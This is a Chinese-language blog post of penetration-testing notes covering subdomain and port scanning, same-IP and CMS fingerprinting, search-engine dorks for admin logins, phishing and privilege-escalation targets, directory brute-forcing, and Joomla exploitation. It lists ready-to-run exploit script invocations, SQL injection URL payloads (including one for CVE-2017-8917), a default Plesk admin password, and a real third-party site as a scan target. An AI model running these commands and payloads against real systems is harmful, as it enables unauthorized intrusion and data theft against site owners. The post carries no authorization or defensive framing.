渗透测试

扫子域,扫端口

 

子域名:

esd   esd -d xxxx.com

jsfinder  python3 JSFinder.py -u http://tajikpost.tj/ru/ -d -ou mi_url.txt -os mi_subdomain.txt

https://phpinfo.me/domain/

Layer子域名挖掘机

http://z.zcjun.com/

subDomainsBrute  python subDomainsBrute.py xxx.com --full

 

 

nmap -sS -p 1-65535 -v XXX.XXX.XXX.XXX

 

DNS数据集平台:基于全网信息持续收集的平台,根据其收录的信息,以快速查找到需要的数据。

(1) DNSdumpster:https://dnsdumpster.com/

(2) VirusTotal:https://www.virustotal.com/#/home/search

https://dnsdb.io/zh-cn/| https://x.threatbook.cn/

防火墙(waf)识别

 wafw00f 命令

 

nmap: nmap -sS -0 -p0 xxx.xxx.xxx -p-

旁站信息收集

http://dns.aizhan.com

http://s.tool.chinaz.com/same

http://i.links.cn/sameip/

http://www.ip2hosts.com/

https://phpinfo.me/bing.php

http://www.webscan.cc/

GitHub信息收集工具:https://github.com/MiSecurity/x-patrol

 cms识别:

 

(1)  云悉:http://www.yunsee.cn/info.html

(2)  查看数据包响应头

(3)  CMS指纹识别:http://whatweb.bugscaner.com/look/

 

搜索引擎语法

后台:site:xxx.xxx admin|login|system|管理|登录|内部|系统

钓鱼:site:xxx.xxx 邮件|email

社工:site:xxx.xxx qq|群|微信|腾讯

越权:site:xxx.xxx inurl:uid=1|userid=1

包含:site:xxx.xxx inurl:php?include=

 Hosts碰撞:https://github.com/r35tart/Hosts_scan

 跑目录: python3 dirseach.py -u xxx.com -e php --random-agents

 cms:

vulnx -u https://xxx.com --timeout 3 -c all -d -w –-exploit

joomal:  python3 Joomla-3-4-6.py -t https://www.xx.com --exploit -l 127.0.0.1 -p 1234

plesk 主机面板: 8443端口 默认的管理员账户密码是 admin,密码:stepu。

 Joomla:

Joomla对象注入漏洞:https://www.freebuf.com/vuls/89754.html

 python joomla_exp.py http://www.xxx.com
 
 python 38977.py
 
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(exp(~(select * from(select md5(1))x)))
 
joomal:  python3 Joomla-3-4-6.py -t https://www.xx.com --exploit -l 127.0.0.1 -p 1234
 
Joomla 3.7.0 (CVE-2017-8917) SQL注入: http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
 
python Joomla_3.4.4-3.6.3_未授权创建特权用户poc.py  
 

 

 

扫源码泄露

web中间件漏洞

Tomcat:8080

Jboss:8080

WebLogic:7001,7002

 

web框架漏洞

Struts2

Spring 

web服务器漏洞

IIS

Apache

Nginx

lighttpd

数据库漏洞

MySQL:3306

MSSQL:1433,1434

Oracle:1521,1158,8080,210

PostgreSQL:5432

MongoDB:27017

SysBase:5000,4100,4200

服务协议漏洞

FTP 

Samba

NFS 

Samba

SSH

Telnet 

 

posted @ 2019-09-13 17:04  可乐'  阅读(459)  评论(0编辑  收藏  举报